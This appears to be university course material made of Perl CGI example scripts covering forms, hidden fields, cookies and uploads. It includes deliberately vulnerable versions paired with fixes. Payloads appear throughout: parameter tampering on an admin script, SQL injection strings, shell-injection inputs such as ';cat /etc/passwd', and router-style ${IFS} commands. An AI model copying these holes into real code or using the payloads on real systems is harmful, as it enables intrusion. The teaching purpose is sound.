print header, start_html('Using A Hidden Variable');
warningsToBrowser(1);

if (defined param('x')) {
    $x = param("x") + 1;
} else {
    $x = 0;
}

printf "2**%d = %d\n", $x, 2 ** $x;

print <<eof;
<form method="post" action="">
<input type=hidden name="x" value="$x">
<input type="submit" value="Next Power of 2">
</form>
</html>
eof

Outputs a form which will rerun the script

An input field of type hidden is used to pass an integer to successive invocations

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print header, start_html('Using A Hidden Variable');
warningsToBrowser(1);

if (defined param('x')) {
    $x = param("x") + 1;
} else {
    $x = 0;
}

param('x', $x);

printf "2**%d = %d\n", $x, 2 ** $x;
print start_form, "\n";
print hidden('x'), "\n";
print submit(value => "Next Power of 2"), "\n";
print end_form, "\n";
print end_html, "\n";
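
The hidden-field technique above keeps no state on the server: each response embeds the current value in the form, and the next request sends it back. A minimal Python sketch of that round trip, assuming the submitted parameters are already available as a dictionary; `next_power_page` is a hypothetical name, and a non-numeric x would raise ValueError here.

```python
def next_power_page(params):
    """Return the HTML fragment for the next invocation.

    params maps field names to submitted strings; x is absent on the first visit.
    """
    x = int(params["x"]) + 1 if "x" in params else 0
    return (
        f"2**{x} = {2 ** x}\n"
        '<form method="post" action="">\n'
        f'<input type="hidden" name="x" value="{x}">\n'
        '<input type="submit" value="Next Power of 2">\n'
        "</form>"
    )

print(next_power_page({}))          # first visit
print(next_power_page({"x": "3"}))  # a later visit, x sent back by the form
```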

Outputs a form which will rerun the script

An input field of type hidden is used to pass an integer to successive invocations

Two submit buttons are used to produce different actions

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print <<eof;
Content-Type: text/html

<!DOCTYPE html>
<html lang="en">
<head>
    <title>Handling Multiple Submit Buttons</title>
</head>
<body>
eof
warningsToBrowser(1);

$hidden_variable = param("x") || 0;

if (defined param("increment")) {
	$hidden_variable++;
} elsif (defined param("decrement")) {
	$hidden_variable--;
}

print <<eof;
<h2>$hidden_variable</h2>
<form method="post" action="">
<input type=hidden name="x" value="$hidden_variable">
<input type="submit" name="increment" value="Increment">
<input type="submit" name="decrement" value="Decrement">
</form>
</body>
</html>
eof

Outputs a form which will rerun the script

An input field of type hidden is used to pass an integer to successive invocations

Two submit buttons are used to produce different actions

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print header, start_html('Handling Multiple Submit Buttons');
warningsToBrowser(1);

$hidden_variable = param("x") || 0;

if (defined param("increment")) {
	$hidden_variable++;
} elsif (defined param("decrement")) {
	$hidden_variable--;
}

param('x', $hidden_variable);
print h2($hidden_variable), "\n",
      start_form, "\n",
      hidden('x'), "\n",
      submit('increment'), "\n",
      submit('decrement'), "\n",
      end_form, "\n",
      end_html;

Outputs a form which will rerun the script

An input field of type hidden is used to pass an integer to successive invocations

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print header, start_html('Alternating State');
warningsToBrowser(1);

$x = param('state') || 0;
$x++;
param("state", $x);

print start_form, "\n";

if ($x % 2 == 0) {
    print "What's your name?\n", textfield('name');
} else {
    print "What's your height?\n", textfield('height');
}

print hidden('state'), "\n";
print end_form, "\n";
print end_html, "\n";

Create a pop-up menu with one entry for every file with the suffix .cgi in the current directory

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print header, start_html('Choosing A File');
warningsToBrowser(1);

@cgi_files = glob("*.cgi");
$default = $cgi_files[rand @cgi_files]; # pick an element at random

print start_form, "\n",
    popup_menu('CGI files', \@cgi_files,  $default), "\n",
    end_form, "\n",
    end_html;

Allow users to change a file

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print header, start_html('Editing A File');
warningsToBrowser(1);

$filename = "editfile.data";
$file_content = param('content');

if (param('Save') && defined $file_content) {
    if (open FILE, '>', $filename) {
    	print FILE $file_content;
    	close FILE;
    	print "File saved\n", end_html;
    } else {
    	print "Save failed\n", end_html;
    }
    exit 0;
}

if (!defined $file_content && open F, '<', $filename) {
	$file_content = join "", <F>;
	param('content', $file_content);
}

print   start_form, "\n",
        textarea(-name=>'content', -rows=>10,-cols=>60), "\n",
        p, submit('Save'), "\n",
        end_form, "\n",
        end_html;

Count words in a file.

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print <<eof;
Content-Type: text/html

<!DOCTYPE html>
<html lang="en">
<head>
<title>Word Count</title>
</head>
<body>
eof

my $uploaded_file = param('filename');
if (defined $uploaded_file) {
    my ($lines, $words, $bytes);
    while ($line = <$uploaded_file>) {
        my @words = split /\s+/, $line;
        $words += @words;
        $bytes += length $line;
        $lines++;
    }
    printf "$uploaded_file: %d lines %d words %d bytes\n", $lines, $words, $bytes;
} 

print <<eof;
<form method="post" action="" enctype="multipart/form-data">
<input type="file" name="filename" value="Bitter.html">
<input type="submit" name="upload" value="Word Count File">
</form>
</body>
</html>
eof

Count words in text area, file or URL.

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print header;
print start_html('Word Count');

my $uploaded_file = param('filename');
if (defined $uploaded_file) {
    my ($lines, $words, $bytes);
    while ($line = <$uploaded_file>) {
        my @words = split /\s+/, $line;
        $words += @words;
        $bytes += length $line;
        $lines++;
    }
    printf "$uploaded_file: %d lines %d words %d bytes\n", $lines, $words, $bytes;
} 

print start_form, "\n",
      filefield('filename'),  "\n",
      submit('Word Count File'), "\n",
      end_form, "\n",
      end_html;

Count words in a file.

import cgi, cgitb, re

print """Content-Type: text/html

<!DOCTYPE html>
<html lang="en">
<head>
<title>Word Count</title>
</head>
<body>
"""

cgitb.enable()
parameters = cgi.FieldStorage()

if 'filename' in parameters:
    uploaded_file =parameters['filename'].file
    (lines, words, bytes) = (0, 0, 0)
    for line in uploaded_file:
        words += len(line.split())  # split() with no argument splits on runs of whitespace
        bytes += len(line)
        lines += 1
    print "%s: %d lines %d words %d bytes\n" % (parameters['filename'].filename, lines, words, bytes)

print """
<form method="post" action="" enctype="multipart/form-data">
<input type="file" name="filename" value="Bitter.html">
<input type="submit" name="action" value="Word Count File">
</form>
</body>
</html>
"""

Parameters: index = index into the array of colour names

Hexcodes are often used instead of names e.g. #FF6347 instead of Tomato

use CGI ':all';

@colours = qw/AliceBlue AntiqueWhite Aqua Aquamarine Azure Beige Bisque Black BlanchedAlmond Blue BlueViolet Brown BurlyWood CadetBlue Chartreuse Chocolate Coral CornflowerBlue Cornsilk Crimson Cyan DarkBlue DarkCyan DarkGoldenRod DarkGray DarkGreen DarkKhaki DarkMagenta DarkOliveGreen DarkOrange DarkOrchid DarkRed DarkSalmon DarkSeaGreen DarkSlateBlue DarkSlateGray DarkTurquoise DarkViolet DeepPink DeepSkyBlue DimGray DodgerBlue FireBrick FloralWhite ForestGreen Fuchsia Gainsboro GhostWhite Gold GoldenRod Gray Green GreenYellow HoneyDew HotPink IndianRed Indigo Ivory Khaki Lavender LavenderBlush LawnGreen LemonChiffon LightBlue LightCoral LightCyan LightGoldenRodYellow LightGray LightGreen LightPink LightSalmon LightSeaGreen LightSkyBlue LightSlateGray LightSteelBlue LightYellow Lime LimeGreen Linen Magenta Maroon MediumAquaMarine MediumBlue MediumOrchid MediumPurple MediumSeaGreen MediumSlateBlue MediumSpringGreen MediumTurquoise MediumVioletRed MidnightBlue MintCream MistyRose Moccasin NavajoWhite Navy OldLace Olive OliveDrab Orange OrangeRed Orchid PaleGoldenRod PaleGreen PaleTurquoise PaleVioletRed PapayaWhip PeachPuff Peru Pink Plum PowderBlue Purple RebeccaPurple Red RosyBrown RoyalBlue SaddleBrown Salmon SandyBrown SeaGreen SeaShell Sienna Silver SkyBlue SlateBlue SlateGray Snow SpringGreen SteelBlue Tan Teal Thistle Tomato Turquoise Violet Wheat White WhiteSmoke Yellow YellowGreen/;

$index = param('index') || 0;
$color_name  = $colours[$index % @colours];
param('index', $index + 1);

print header, "\n",
	start_html(-bgcolor => $color_name),
	start_form, "\n",
	h1($color_name), "\n",
    hidden('index'), "\n",
    submit("Next colour"), "\n",
    end_form, "\n",
    end_html;

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

# Simple CGI script written by andrewt@cse.unsw.edu.au
# Outputs a form which will rerun the script
# An input field of type hidden is used to pass an integer
# to successive invocations

$max_number_to_guess = 99;

print <<eof;
Content-Type: text/html

<!DOCTYPE html>
<html lang="en">
<head>
    <title>Guess A Number</title>
</head>
<body>
eof

warningsToBrowser(1);

$number_to_guess = param('number_to_guess');
$guess = param('guess');

$game_over = 0;

if (defined $number_to_guess and defined $guess) {
    $guess =~ s/\D//g;
    $number_to_guess =~ s/\D//g;
    if ($guess == $number_to_guess) {
        print "You guessed right, it was $number_to_guess.\n";
        $game_over = 1;
    } elsif ($guess < $number_to_guess) {
        print "It's higher than $guess.\n";
    } else {
        print "It's lower than $guess.\n";
    }
} else {
    $number_to_guess = 1 + int(rand $max_number_to_guess);
    print "I've thought of a number in the range 1..$max_number_to_guess\n";
}

if ($game_over) {
print <<eof;
    <form method="POST" action="">
        <input type="submit" value="Play Again">
    </form>
eof
} else {
print <<eof;
    <form method="POST" action="">
        <input type="textfield" name="guess">
        <input type="hidden" name="number_to_guess" value="$number_to_guess">
    </form>
eof
}

print <<eof;
</body>
</html>
eof

Retrieves the value stored for x in a cookie, if there is one, increments it, and sets the cookie to the new value.

$x = 0;
if (defined $ENV{HTTP_COOKIE} && $ENV{HTTP_COOKIE} =~ /\bx=(\d+)/) {
    $x = $1 + 1;
}
print "Content-type: text/html
Set-Cookie: x=$x;

<html><head></head><body>
x=$x
</body></html>";

Retrieves the value stored for x in a cookie, if there is one, increments it, and sets the cookie to the new value.

use CGI qw/:all/;
use CGI::Cookie;

%cookies = fetch CGI::Cookie;
$x = 0;
$x = $cookies{'x'}->value if $cookies{'x'};
$x++;
print header(-cookie=>"x=$x"), start_html('Cookie Example'), "x=$x", end_html;


to demonstrate a possible CGI security hole

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print <<eof;
Content-Type: text/html

<!DOCTYPE html>
<html lang="en">
<head>
<title>Insecure 2041 admin script</title>
</head>
<body>
eof

warningsToBrowser(1);

# insecure: user may set this parameter directly
# For example using this URL:
# http://www.cse.unsw.edu.au/code/cgi/admin_script.cgi?password_checked=1&student_number=5555555&new_mark=100

if (param('password_checked')) {
    if (param('student_number') && param('new_mark')) {
        mark_changed_screen();
    } else {
        change_mark_screen()
    }
} elsif (defined param('login') && defined param('password')) {
    if (authenticate_password()) {
        param('password_checked', 1);
        change_mark_screen();
    } else {
        wrong_password_screen();
    }
} else {
    login_screen();
}

exit 0;

sub login_screen {
    print <<eof
<form action="">
Enter login: <input type="textfield" name="login">
<br>
Enter password: <input type="password" name="password">
<br>
<input type="submit" value="Login">
</form>
</body>
</html>  
eof
}

sub wrong_password_screen {
    print "Login or password incorrect.\n<p>\n";
    login_screen();
}


sub authenticate_password {
    my $login = param('login');
    my $password = param('password');
    return $login && $password && $login eq "andrewt" && $password eq "secret";
}

sub change_mark_screen {
    print <<eof
<form action="">
Enter 2041 student number: <input type="textfield" name="student_number">
<br>
Enter new mark: <input type="textfield" name="new_mark">
<br>
<input type="submit" value="Change mark">
<input type="hidden" name="password_checked" value="1">
</form>
</body>
</html>  
eof
}

sub mark_changed_screen {
    my $student_number = param('student_number');
    my $new_mark = param('new_mark');
    print  "Mark for $student_number set to $new_mark\n<p>\n";
    change_mark_screen();
}


To demonstrate fixing a CGI security hole.

Note: login and password are passed as hidden fields by the admin screen and authenticated again before changing a mark.

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);


print <<eof;
Content-Type: text/html

<!DOCTYPE html>
<html lang="en">
<head>
<title>Insecure 2041 admin script - fixed</title>
</head>
<body>
eof
warningsToBrowser(1);

if (defined param('login') && defined param('password')) {
    if (authenticate_password()) {
        if (param('student_number') && param('new_mark')) {
            mark_changed_screen();
        } else {
            change_mark_screen()
        }
    } else {
        wrong_password_screen();
    }
} else {
    login_screen();
}
exit 0;

sub login_screen {
    print <<eof
<form action="">
Enter login: <input type="textfield" name="login">
<br>
Enter password: <input type="password" name="password">
<br>
<input type="submit" value="Login">
</form>
</body>
</html>  
eof
}

sub wrong_password_screen {
    print "Login or password incorrect.\n<p>\n";
    login_screen();
}


sub authenticate_password {
    my $login = param('login');
    my $password = param('password');
    return $login && $password && $login eq "andrewt" && $password eq "secret";
}

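sub change_mark_screen {
    # resend the submitted credentials so they are authenticated again on the next request
    my $login = escapeHTML(scalar param('login'));
    my $password = escapeHTML(scalar param('password'));
    print <<eof
<form action="">
Enter 2041 student number: <input type="textfield" name="student_number">
<br>
Enter new mark: <input type="textfield" name="new_mark">
<br>
<input type="submit" value="Change mark">
<input type="hidden" name="login" value="$login">
<input type="hidden" name="password" value="$password">
</form>
</body>
</html>  
eof
}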

sub mark_changed_screen {
    my $student_number = param('student_number');
    my $new_mark = param('new_mark');
    print  "Mark for $student_number set to $new_mark\n<p>\n";
    change_mark_screen();
}


to demonstrate a possible CGI security hole

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print <<eof;
Content-Type: text/html

<!DOCTYPE html>
<html lang="en">
<head>
<title>Insecure 2041 admin script</title>
</head>
<body>
eof

warningsToBrowser(1);

# insecure: user may set this parameter directly
# For example using this URL:
# http://www.cse.unsw.edu.au/code/cgi/admin_script.cgi?password_checked=1&student_number=5555555&new_mark=100

$token = param('token');
if (defined $token) {
	$token =~ s/[^\w\-]//g;
	$token_file = "issued_tokens/$token";
	# check we've issued token in the last day
	if (length($token) > 30 && -e $token_file && -M $token_file < 1) {
	    if (param('student_number') && param('new_mark')) {
	        mark_changed_screen();
	    } else {
	        change_mark_screen()
	    }
	} else {
	    login_screen();
	}
} elsif (defined param('login') && defined param('password')) {
    if (authenticate_password()) {
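        # get a unique 128-bit UUID
        $token = `uuidgen`;
        chomp $token;
        $token_file = "issued_tokens/$token";
        # an empty file records that this token was issued; its age is checked later
        open F, '>', $token_file or die "can not create $token_file: $!";
        close F;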
        param('token', $token);
        change_mark_screen();
    } else {
        wrong_password_screen();
    }
} else {
    login_screen();
}

exit 0;

sub login_screen {
    print <<eof
<form action="">
Enter login: <input type="textfield" name="login">
<br>
Enter password: <input type="password" name="password">
<br>
<input type="submit" value="Login">
</form>
</body>
</html>  
eof
}

sub wrong_password_screen {
    print "Login or password incorrect.\n", p;
    login_screen();
}


sub authenticate_password {
    my $login = param('login');
    my $password = param('password');
    return $login && $password && $login eq "andrewt" && $password eq "secret";
}

sub change_mark_screen {
    print <<eof
<form action="">
Enter 2041 student number: <input type="textfield" name="student_number">
<br>
Enter new mark: <input type="textfield" name="new_mark">
<br>
<input type="submit" value="Change mark">
<input type="hidden" name="token" value="$token">
</form>
</body>
</html>  
eof
}

sub mark_changed_screen {
    my $student_number = param('student_number');
    my $new_mark = param('new_mark');
    print  "Mark for $student_number set to $new_mark\n<p>\n";
    change_mark_screen();
}
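
The script above relies on the external uuidgen command for its token. A minimal sketch of generating a token inside Perl instead, assuming a system that provides /dev/urandom. The names new_token and token_looks_valid are hypothetical helpers, not part of the course code.

```perl
use strict;
use warnings;

# hypothetical helper: return a 32-character hex token built from 16 random bytes
sub new_token {
    open my $fh, '<:raw', '/dev/urandom' or die "Can not open /dev/urandom: $!";
    my $got = read $fh, my $bytes, 16;
    close $fh;
    die "Short read from /dev/urandom" if !defined $got || $got != 16;
    return unpack 'H*', $bytes;
}

# hypothetical helper: accept only tokens of exactly the shape new_token produces
sub token_looks_valid {
    my ($token) = @_;
    return defined $token && $token =~ /\A[0-9a-f]{32}\z/;
}

print new_token(), "\n";
```

Rejecting a token that does not match the expected pattern, rather than deleting unexpected characters from it, means a malformed token is never used to build a filename.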


to demonstrate SQL injection

This script expects parameters such as: user=andrewt password=secret

It can be fooled by including SQL code in the password parameter, for example: user=andrewt password=' or '42'='42

These commands generate a suitable sqlite database for the script:

echo "create table passwd(user TEXT, password TEXT);"|sqlite3 user.db
echo "insert into passwd(user,password) values('andrewt','secret');"|sqlite3 user.db

use CGI qw/:all/;
use DBI;

print header, start_html('SQL Injection');
if (!defined param('user')) {
    print start_form, 'User: ', textfield('user'),p, 'Password: ', textfield('password'),p,submit,end_form;
    print p,"Should only be able to authenticate with user <font color=red>andrewt</font>, password <font color=red>secret</font>\n";
    print p,"But try any user with password <font color=red>' or '42'='42</font>\n",p,end_html;
    exit(0);
}

$dbh = DBI->connect( "dbi:SQLite:user.db" ) || die;
$user = param('user');
$password = param('password');
$res = $dbh->selectall_arrayref("SELECT * from passwd where user='$user' and password='$password'");
if (@$res) {
    print "Authenticated\n";
} else {
    print "Wrong password\n";
}

print "<p><tt><small>sql query = SELECT * from passwd where user='$user' and password='$password'\n",end_html;

with SQL injection security hole fixed

This script expects parameters such as: user=andrewt password=secret

Unlike the insecure version, it should not be fooled by SQL code in the password parameter, for example: user=andrewt password=' or 't'='t

These commands generate a suitable sqlite database for the script:

echo "create table passwd(user TEXT, password TEXT);"|sqlite3 user.db
echo "insert into passwd(user,password) values('andrewt','secret');"|sqlite3 user.db

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);
use DBI;

print header, start_html('SQL Injection - Avoided');
warningsToBrowser(1);

if (!defined param('user')) {
    print start_form, 'User: ', textfield('user'),p, 'Password: ', textfield('password'),p,submit,end_form;
    print p,"Should only be able to authenticate with user <font color=red>andrewt</font>, password <font color=red>secret</font>\n";
    print p,"Adding SQL will not help, e.g. try: <font color=red>' or '42'='42</font>\n",p,end_html;
    exit(0);
}

$dbh = DBI->connect( "dbi:SQLite:user.db" ) || die;

$user = param('user');
$user = substr $user, 0, 64;          # limit user name to 64 characters
$user =~ s/\W+//g;                    # remove all but expected characters
$user = $dbh->quote($user);           # should be unnecessary
$password = param('password');
$password = substr $password, 0, 64;  # limit password to 64 characters
$password = $dbh->quote($password);   # quote SQL special characters

$res = $dbh->selectall_arrayref("SELECT * from passwd where user=$user and password=$password");
if (@$res) {
    print "Authenticated\n";
} else {
    print "Wrong password\n";
}

print "<p><tt><small>sql query = SELECT * from passwd where user=$user and password=$password\n",end_html;
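
Another common way to avoid SQL injection is to use placeholders, so that user input is never pasted into the SQL text at all. The sketch below assumes DBI and DBD::SQLite are installed and uses an in-memory database rather than user.db. The function name authenticated is a hypothetical helper.

```perl
use strict;
use warnings;
use DBI;

# in-memory database, so this sketch does not touch user.db
my $dbh = DBI->connect("dbi:SQLite:dbname=:memory:", "", "", { RaiseError => 1 });
$dbh->do("create table passwd(user TEXT, password TEXT)");
$dbh->do("insert into passwd(user,password) values(?, ?)", undef, 'andrewt', 'secret');

# hypothetical helper: true if a row matches both user and password
sub authenticated {
    my ($user, $password) = @_;
    # each ? is bound by the driver as a value and is never parsed as SQL
    my ($count) = $dbh->selectrow_array(
        "SELECT count(*) from passwd where user=? and password=?",
        undef, $user, $password);
    return $count > 0;
}

print authenticated('andrewt', 'secret')        ? "Authenticated\n" : "Wrong password\n";
print authenticated('andrewt', "' or '42'='42") ? "Authenticated\n" : "Wrong password\n";
```

With placeholders there is no need to call quote or to strip characters from the password, because the query text is fixed before any user input is seen.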

See also: http://xkcd.com/327/

<!DOCTYPE html>
<html lang="en">
<head>
<title>Command</title>
</head>
<body>
<input type=text id="x" onkeyup="sum();"> +
<input type=text id="y" onkeyup="sum();"> =
<input type=text id="sum" readonly="readonly">
<script type="text/javascript">
function sum() {
    var x = parseInt(document.getElementById('x').value) || 0;
    var y = parseInt(document.getElementById('y').value) || 0;
    document.getElementById('sum').value = x + y;
}
</script>
</body>
</html>

use CGI qw/:all -debug/;

$checker = <<xxJSxx
function check(form) {
    if (form.mystring.value.length > 6) {
        alert("String too long")
        return false;
    }
    return true;
}
xxJSxx
;

$mystring = param("mystring");

print header, start_html(-script=>$checker),
    h3("Type a string"),
    start_form(-onsubmit=>"return check(this);"),
    textfield("mystring","",10,8),
    submit("Send"),
    end_form;

if (defined $mystring) {
    $nc = length($mystring);
    print p("String: '$mystring' has $nc chars");
}
print end_html;

<html>
<head>
<title>Command</title>
</head>
<body>
<button id="match">Match</button> regular expression <input type=text id=regex>
<br>
against string <input type=text id=string>
<div id="show"></div>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.6.4/jquery.min.js"></script>
<script type="text/javascript">
$(document).ready(
    function() {
        $("#match").click(
            function() {
                $.get(
                    "match.cgi",
                    {string:$("#string").val(), regex:$("#regex").val()},
                    function(data) {
                        $("#show").html(data)
                    }
                )
            }
        )
    }
)
</script>
</body>
</html>

See match.html

use CGI qw/:all/;
print header;
if (param('string') =~ param('regex')) {
    print b('Match succeeded, this substring matched: ');
    print tt(escapeHTML($&));
} else {
    print b('Match failed');
}

Pick a random image from a directory and overlay the image with its filename using ImageMagick.

$directory = "./images";
foreach $file (glob "$directory/*.jpg") {
    next if !-r $file;
    push @files, $file;
}

$random_file = $files[rand @files];
$name = $random_file;
$name =~ s/\.jpg$//;
$name =~ s/.*\///;
$name =~ s/[\-_]/ /g;
$name =~ s/[^\w\s]//g;
$convert_options = "-gravity south -pointsize 72 -stroke '#0004' -strokewidth 2 -annotate 0 '$name' -stroke none -fill white -annotate 0 '$name'";
print "Content-type: image/jpeg\n\n";
system "convert '$random_file' $convert_options -"


to demonstrate a CGI security hole

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print header, start_html('Insecure Shell');
warningsToBrowser(1);

$login = param("login");
if (!defined $login) {
	print start_form, 'Enter login: ', textfield('login'), end_form, end_html;
	exit 0;
}

# insecure $login may contain shell meta-characters
# e.g it might be "andrewt;cat /etc/passwd"

$user_id =`/usr/bin/id $login`;
print "The user id of $login is $user_id\n", end_html;

to demonstrate removal of a CGI security hole

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);


print header, start_html('Insecure Shell Fixed');
warningsToBrowser(1);

$login = param("login");
if (!defined $login) {
	print start_form, 'Enter login: ', textfield('login'), end_form, end_html;
	exit 0;
}

$login = substr($login, 0, 32); # limit login to 32 characters
$login =~ s/[^\w\-]//g;         # remove all but expected characters
$user_id =`/usr/bin/id $login`;
print "The user id of $login is '$user_id'\n", end_html;
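
An alternative to sanitizing the string is to avoid the shell entirely. A minimal sketch, using the list form of open to run a program directly. The function name run_without_shell is a hypothetical helper, and the perl interpreter itself ($^X) stands in for /usr/bin/id so the example runs anywhere.

```perl
use strict;
use warnings;

# hypothetical helper: run a command without a shell and return its output
sub run_without_shell {
    my @command = @_;
    # the list form of open passes each argument to the program unchanged,
    # so characters such as ; | and $ are never interpreted by a shell
    open my $pipe, '-|', @command or die "Can not run $command[0]: $!";
    my $output = join '', <$pipe>;
    close $pipe;
    return $output;
}

# a hostile "login" reaches the program as one literal argument
my $login = 'andrewt;cat /etc/passwd';
print run_without_shell($^X, '-e', 'print "argument: $ARGV[0]\n"', $login);
```

In the CGI script the call would be something like run_without_shell('/usr/bin/id', '--', $login), where the -- also stops a login beginning with - being treated as an option.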

to demonstrate a possible CGI security hole

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print header, start_html('Insecure Mail');
warningsToBrowser(1);

$login = param("login");
if (!defined $login) {
	print start_form, 'Enter login: ', textfield('login'), end_form, end_html;
	exit 0;
}

# insecure $login may contain shell meta-characters
# e.g it might be "andrewt;cat /etc/passwd"

system "echo hello|mutt -e 'set copy=no' -s 'web message' $login";

print "Mail sent to $login\n", end_html;

with CGI security hole probably fixed

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print header, start_html('Insecure Mail Fixed');
warningsToBrowser(1);

$address = param("address");
if (!defined $address) {
	print start_form, 'Enter e-mail address: ', textfield('address'), end_form, end_html;
	exit 0;
}

# This seems to avoid problems with Shell special characters
# but it is safer to run mail directly rather than via the shell
$address = substr($address, 0, 256);
# Remove all but characters legal in e-mail addresses
$address =~ s/[^\w\.\@\-\!\#\$\%\&\'\*\+\-\/\=\?\^_\`\{\|\}\~]//g;
# A single quote can not be backslash-escaped inside a single-quoted Shell string,
# so close the string, add an escaped quote and reopen it: ' becomes '\''
$address =~ s/'/'\\''/g;
system "echo hello|mutt -e 'set copy=no' -s  'web message' -- '$address'";
print "Mail sent to $address\n", end_html;

to simulate the security hole present in some Linksys routers

This security hole was exploited to allow the router's operating system to be upgraded by the user, by entering commands like these: ;cp${IFS}*/*/nvram${IFS}/tmp/n ;*/n${IFS}set${IFS}boot_wait=on ;*/n${IFS}commit ;*/n${IFS}show>tmp/ping.log

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);



print header, start_html('Simulation of Linksys Ping Test Hole');
warningsToBrowser(1);

$host = param("host");
if (!defined $host) {
	print start_form, 'Enter host to ping: ', textfield('host'), end_form;
} else {
	print "<pre>";
	system "ping -c 1 $host";
	print "</pre>";
}
print end_html;

to simulate the security hole present in some Linksys routers, with the security hole removed

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print header, start_html('Simulation of Linksys Ping Test Hole');
warningsToBrowser(1);

$host = param("host");
if (!defined $host) {
	print start_form, 'Enter host to ping: ', textfield('host'), end_form;
} else {
	$host = substr $host, 0, 256;          # limit host name to 256 characters
	$host =~ s/[^\w\-\.]//g;               # remove all but permitted characters
	print "<pre>";
	system "ping -c 1 $host";
	print "</pre>";
}
print end_html;

to demonstrate a CGI security hole

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print header, start_html('Insecure Open');
warningsToBrowser(1);

$filename = param("filename");
if (!defined $filename) {
	print start_form, 'Enter filename: ', textfield('filename'), end_form, end_html;
	exit 0;
}

chdir "/tmp";

# insecure: $filename might contain |, > or < characters
# $filename may also contain / or ..
open F, $filename or die "Can not open $filename: $!";
print "The contents of $filename are:<pre>";
print <F>;
print "</pre>", end_html;

to demonstrate removal of a CGI security hole

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print header, start_html('Insecure Open Fixed');
warningsToBrowser(1);

$filename = param("filename");
if (!defined $filename) {
	print start_form, 'Enter filename: ', textfield('filename'), end_form, end_html;
	exit 0;
}

chdir "/tmp";

$filename = substr($filename, 0, 4096);
$filename =~ s/\///g;
$filename =~ s/^\.*$//;
open F, '<', $filename or die "Can not open $filename: $!";
print "The contents of $filename are:<pre>";
print <F>;
print "</pre>", end_html;
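
An alternative to deleting unwanted characters is to reject any filename that does not match a pattern of permitted characters. A minimal sketch follows. The function name safe_filename and the particular set of permitted characters are assumptions chosen for illustration.

```perl
use strict;
use warnings;

# hypothetical helper: return the filename if it is acceptable, otherwise undef
sub safe_filename {
    my ($name) = @_;
    return if !defined $name;
    return if length($name) > 255;
    # first character must not be a dot, and / | < > can never appear
    return if $name !~ /\A[\w\-][\w\-.]*\z/;
    return $name;
}

foreach my $candidate ('notes.txt', '../etc/passwd', '|ls', '..') {
    my $verdict = defined safe_filename($candidate) ? 'accepted' : 'rejected';
    print "$candidate: $verdict\n";
}
```

Rejecting bad input outright avoids the risk that a partly cleaned filename still names a file the user should not see.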

to demonstrate a possible CGI security hole

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print <<eof;
Content-Type: text/html

<!DOCTYPE html>
<html lang="en">
<head>
<title>Insecure 2041 admin script</title>
</head>
<body>
eof

warningsToBrowser(1);

# insecure: user may set this parameter directly
# For example using this URL:
# http://www.cse.unsw.edu.au/code/cgi/admin_script.cgi?password_checked=1&student_number=5555555&new_mark=100

if (param('password_checked')) {
    if (param('student_number') && param('new_mark')) {
        mark_changed_screen();
    } else {
        change_mark_screen()
    }
} elsif (defined param('login') && defined param('password')) {
    if (authenticate_password()) {
        param('password_checked', 1);
        change_mark_screen();
    } else {
        wrong_password_screen();
    }
} else {
    login_screen();
}

exit 0;

sub login_screen {
    print <<eof
<form action="">
Enter login: <input type="textfield" name="login">
<br>
Enter password: <input type="password" name="password">
<br>
<input type="submit" value="Login">
</form>
</body>
</html>  
eof
}

sub wrong_password_screen {
    print "Login or password incorrect.\n<p>\n";
    login_screen();
}


sub authenticate_password {
    my $login = param('login');
    my $password = param('password');
    return $login && $password && $login eq "andrewt" && $password eq "secret";
}

sub change_mark_screen {
    print <<eof
<form action="">
Enter 2041 student number: <input type="textfield" name="student_number">
<br>
Enter new mark: <input type="textfield" name="new_mark">
<br>
<input type="submit" value="Change mark">
<input type="hidden" name="password_checked" value="1">
</form>
</body>
</html>  
eof
}

sub mark_changed_screen {
    my $student_number = param('student_number');
    my $new_mark = param('new_mark');
    print  "Mark for $student_number set to $new_mark\n<p>\n";
    change_mark_screen();
}


to demonstrate fixing a CGI security hole. Note that login & password are passed as hidden fields by the admin screen and authenticated again before changing a mark.

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);


print <<eof;
Content-Type: text/html

<!DOCTYPE html>
<html lang="en">
<head>
<title>Insecure 2041 admin script - fixed</title>
</head>
<body>
eof
warningsToBrowser(1);

if (defined param('login') && defined param('password')) {
    if (authenticate_password()) {
        if (param('student_number') && param('new_mark')) {
            mark_changed_screen();
        } else {
            change_mark_screen()
        }
    } else {
        wrong_password_screen();
    }
} else {
    login_screen();
}
exit 0;

sub login_screen {
    print <<eof
<form action="">
Enter login: <input type="textfield" name="login">
<br>
Enter password: <input type="password" name="password">
<br>
<input type="submit" value="Login">
</form>
</body>
</html>  
eof
}

sub wrong_password_screen {
    print "Login or password incorrect.\n<p>\n";
    login_screen();
}


sub authenticate_password {
    my $login = param('login');
    my $password = param('password');
    return $login && $password && $login eq "andrewt" && $password eq "secret";
}

